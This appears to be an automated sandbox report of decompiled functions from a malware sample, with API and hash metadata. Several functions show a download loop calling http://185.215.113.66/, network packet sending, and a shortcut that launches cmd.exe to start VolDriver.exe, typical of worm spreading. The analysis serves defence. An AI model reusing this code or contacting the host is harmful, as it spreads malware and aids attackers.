                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2945370292-0
                                                                                                                                                                                                                                                                  • Opcode ID: 83e2c9dd5534507d00b708f5602cd6ee7c992e6f706f8ffe9372c3b8fc6bc520
                                                                                                                                                                                                                                                                  • Instruction ID: 3207af2ea602bfb65b54bf45aa4f15af2ab48cc6669a523460d3cb6d0fbea14a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e2c9dd5534507d00b708f5602cd6ee7c992e6f706f8ffe9372c3b8fc6bc520
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4771C0F5E002099BCB04DF94D985BEFB7B1BB88304F148579E644BB381C778A952CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040B8C0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				signed int* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _t49;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                                                                                                                                  					L8:
                                                                                                                                                                                                                                                                  					return _v8;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v12 = _a4;
                                                                                                                                                                                                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				E0040B840( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                                                                                                                                  					_v12[7] = E00408880(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                  					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                                                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                  							if(_a24 != 0) {
                                                                                                                                                                                                                                                                  								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                  				goto L8;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x0040b8c6
                                                                                                                                                                                                                                                                  0x0040b8d1
                                                                                                                                                                                                                                                                  0x0040b9a8
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b9ae
                                                                                                                                                                                                                                                                  0x0040b8da
                                                                                                                                                                                                                                                                  0x0040b8e4
                                                                                                                                                                                                                                                                  0x0040b8ee
                                                                                                                                                                                                                                                                  0x0040b8fa
                                                                                                                                                                                                                                                                  0x0040b91f
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b945
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b95c
                                                                                                                                                                                                                                                                  0x0040b96a
                                                                                                                                                                                                                                                                  0x0040b970
                                                                                                                                                                                                                                                                  0x0040b97c
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b98e
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b994
                                                                                                                                                                                                                                                                  0x0040b94c
                                                                                                                                                                                                                                                                  0x0040b929
                                                                                                                                                                                                                                                                  0x0040b9a2
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B880
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: CloseHandle.KERNEL32(?), ref: 0040B899
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040B93F
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                  • Opcode ID: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction ID: 002a0dc9329e903af3e7deb21e8176c7de0be147670cf5542ad48bfb447a56cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C33110B4900208EFDB14DF98D889B9E77B5FF48304F008568F945A7391D778AA95CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004076A0(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                  				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				return _a4;
                                                                                                                                                                                                                                                                  			}



                                                                                                                                                                                                                                                                  0x004076ad
                                                                                                                                                                                                                                                                  0x004076be
                                                                                                                                                                                                                                                                  0x004076c7
                                                                                                                                                                                                                                                                  0x004076ca
                                                                                                                                                                                                                                                                  0x004076e0
                                                                                                                                                                                                                                                                  0x004076fc
                                                                                                                                                                                                                                                                  0x00407705
                                                                                                                                                                                                                                                                  0x00407708
                                                                                                                                                                                                                                                                  0x0040771e
                                                                                                                                                                                                                                                                  0x0040773a
                                                                                                                                                                                                                                                                  0x00407743
                                                                                                                                                                                                                                                                  0x00407746
                                                                                                                                                                                                                                                                  0x00407752

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 673498613-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction ID: 5c97871b7af6941603d612d690eec0be109c5698e055a0afcac2a9503b7b8ad0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2114F326005186B9B10EF5EC48268ABBE6EFC43A0B14C176FC2CCF319D634E9514BD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00405A20() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				signed int _v44;
                                                                                                                                                                                                                                                                  				char _v148;
                                                                                                                                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                                                                                                                                  				intOrPtr _v160;
                                                                                                                                                                                                                                                                  				intOrPtr _v164;
                                                                                                                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                                                                                                                  				signed int _v172;
                                                                                                                                                                                                                                                                  				signed char _t35;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t46;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v168 = 0x410130;
                                                                                                                                                                                                                                                                  				_v164 = 0x410134;
                                                                                                                                                                                                                                                                  				_v160 = 0x410138;
                                                                                                                                                                                                                                                                  				_v156 = 0x41013c;
                                                                                                                                                                                                                                                                  				_v152 = 0x410140;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					_v172 = 0;
                                                                                                                                                                                                                                                                  					while(_v172 < 5) {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                  						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                  						_t35 = E0040D160( &_v148, _t45 + _v172 * 4 - 0x28);
                                                                                                                                                                                                                                                                  						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                  						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  							E0040D210( &_v148, 0);
                                                                                                                                                                                                                                                                  							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0xdbba0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x00405a29
                                                                                                                                                                                                                                                                  0x00405a32
                                                                                                                                                                                                                                                                  0x00405a35
                                                                                                                                                                                                                                                                  0x00405a38
                                                                                                                                                                                                                                                                  0x00405a3b
                                                                                                                                                                                                                                                                  0x00405a3e
                                                                                                                                                                                                                                                                  0x00405a41
                                                                                                                                                                                                                                                                  0x00405a44
                                                                                                                                                                                                                                                                  0x00405a47
                                                                                                                                                                                                                                                                  0x00405a4a
                                                                                                                                                                                                                                                                  0x00405a4d
                                                                                                                                                                                                                                                                  0x00405a57
                                                                                                                                                                                                                                                                  0x00405a61
                                                                                                                                                                                                                                                                  0x00405a6b
                                                                                                                                                                                                                                                                  0x00405a75
                                                                                                                                                                                                                                                                  0x00405a7f
                                                                                                                                                                                                                                                                  0x00405a84
                                                                                                                                                                                                                                                                  0x00405a8a
                                                                                                                                                                                                                                                                  0x00405aa5
                                                                                                                                                                                                                                                                  0x00405ab3
                                                                                                                                                                                                                                                                  0x00405ac6
                                                                                                                                                                                                                                                                  0x00405ac7
                                                                                                                                                                                                                                                                  0x00405ad8
                                                                                                                                                                                                                                                                  0x00405af3
                                                                                                                                                                                                                                                                  0x00405af8
                                                                                                                                                                                                                                                                  0x00405b01
                                                                                                                                                                                                                                                                  0x00405b0c
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405b1b
                                                                                                                                                                                                                                                                  0x00405b1b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                  • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                  • API String ID: 3195947292-2646931437
                                                                                                                                                                                                                                                                  • Opcode ID: db831dabfc09dcc662437302b10c0b813bdcb2051b2d4d57cf9ac82af9635b94
                                                                                                                                                                                                                                                                  • Instruction ID: 9179b70c853e6521bba14d82c2a0a6f7832d18f48ba41fe3fbda8a5cdd5ecee7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db831dabfc09dcc662437302b10c0b813bdcb2051b2d4d57cf9ac82af9635b94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C210C70E00318EFCB60DF64CD45B9EBBB4AB49304F5081AAD54DB6281DB795A88CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E0040D8F0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                  				short _v6;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				int* _v24;
                                                                                                                                                                                                                                                                  				char _v25;
                                                                                                                                                                                                                                                                  				char _v29;
                                                                                                                                                                                                                                                                  				int* _v52;
                                                                                                                                                                                                                                                                  				char _v53;
                                                                                                                                                                                                                                                                  				short _t30;
                                                                                                                                                                                                                                                                  				short _t35;
                                                                                                                                                                                                                                                                  				long _t38;
                                                                                                                                                                                                                                                                  				int* _t45;
                                                                                                                                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				int _t64;
                                                                                                                                                                                                                                                                  				long _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = _a4;
                                                                                                                                                                                                                                                                  				_t64 = __eax;
                                                                                                                                                                                                                                                                  				_t30 = 0;
                                                                                                                                                                                                                                                                  				_v25 = 0;
                                                                                                                                                                                                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                  					_t45 = E00408840(_t60);
                                                                                                                                                                                                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                  					_v24 = _t45;
                                                                                                                                                                                                                                                                  					 *_t45 = _t64;
                                                                                                                                                                                                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v10 = 0;
                                                                                                                                                                                                                                                                  					_v6 = 0;
                                                                                                                                                                                                                                                                  					_t35 = _a16;
                                                                                                                                                                                                                                                                  					_v20 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t35);
                                                                                                                                                                                                                                                                  					_v22 = _t35;
                                                                                                                                                                                                                                                                  					_v20 = _a12;
                                                                                                                                                                                                                                                                  					if(_t60 == 0) {
                                                                                                                                                                                                                                                                  						L10:
                                                                                                                                                                                                                                                                  						_v29 = 1;
                                                                                                                                                                                                                                                                  						E00408990(_t45);
                                                                                                                                                                                                                                                                  						return _v29;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t38 = _a4;
                                                                                                                                                                                                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                                                                                                                                                                                                  							_t67 = _t38;
                                                                                                                                                                                                                                                                  							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                  							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                  							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                  							if(_t60 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v53 = 1;
                                                                                                                                                                                                                                                                  								E00408990(_v52);
                                                                                                                                                                                                                                                                  								return _v53;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                                                                                                                                                  							E00408990(_v52);
                                                                                                                                                                                                                                                                  							_t30 = _v53;
                                                                                                                                                                                                                                                                  							goto L12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t45 = _v52;
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L13:
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040d8f9
                                                                                                                                                                                                                                                                  0x0040d8fe
                                                                                                                                                                                                                                                                  0x0040d900
                                                                                                                                                                                                                                                                  0x0040d903
                                                                                                                                                                                                                                                                  0x0040d909
                                                                                                                                                                                                                                                                  0x0040da0a
                                                                                                                                                                                                                                                                  0x0040da10
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d936
                                                                                                                                                                                                                                                                  0x0040d93d
                                                                                                                                                                                                                                                                  0x0040d941
                                                                                                                                                                                                                                                                  0x0040d945
                                                                                                                                                                                                                                                                  0x0040d947
                                                                                                                                                                                                                                                                  0x0040d94e
                                                                                                                                                                                                                                                                  0x0040d952
                                                                                                                                                                                                                                                                  0x0040d956
                                                                                                                                                                                                                                                                  0x0040d95a
                                                                                                                                                                                                                                                                  0x0040d95f
                                                                                                                                                                                                                                                                  0x0040d96b
                                                                                                                                                                                                                                                                  0x0040d970
                                                                                                                                                                                                                                                                  0x0040d979
                                                                                                                                                                                                                                                                  0x0040d97e
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x0040d9e0
                                                                                                                                                                                                                                                                  0x0040d9e1
                                                                                                                                                                                                                                                                  0x0040d9e6
                                                                                                                                                                                                                                                                  0x0040d9f8
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d998
                                                                                                                                                                                                                                                                  0x0040d99e
                                                                                                                                                                                                                                                                  0x0040d9a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9ad
                                                                                                                                                                                                                                                                  0x0040d9b3
                                                                                                                                                                                                                                                                  0x0040d9b5
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9bb
                                                                                                                                                                                                                                                                  0x0040d9c0
                                                                                                                                                                                                                                                                  0x0040d9c5
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d9fe
                                                                                                                                                                                                                                                                  0x0040da03
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040D947
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040D970
                                                                                                                                                                                                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040D998
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D9AD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: 88a18a94d3bc78129496766a0c3d8ab97aedb5bcb2f353dcce8513fb367319d8
                                                                                                                                                                                                                                                                  • Instruction ID: d5c084f29bf55225ac582d60c416bdeb603a939ee1c87b6529a0d2a4f533a5e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88a18a94d3bc78129496766a0c3d8ab97aedb5bcb2f353dcce8513fb367319d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E3185766083419FC710DF69D880AABBBE4AF89714F04457EF9D897382D6349908CBE7
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                                                                                                                  			E00404AA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				short _v540;
                                                                                                                                                                                                                                                                  				char* _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                  				_t37 =  &_v12;
                                                                                                                                                                                                                                                                  				__imp__CoCreateInstance(0x40f338, 0, 1, 0x40f328, _t37);
                                                                                                                                                                                                                                                                  				_v8 = _t37;
                                                                                                                                                                                                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x412c2c, 0x412c2c);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                  					_t42 =  *_v12;
                                                                                                                                                                                                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x40f348,  &_v16);
                                                                                                                                                                                                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  					}
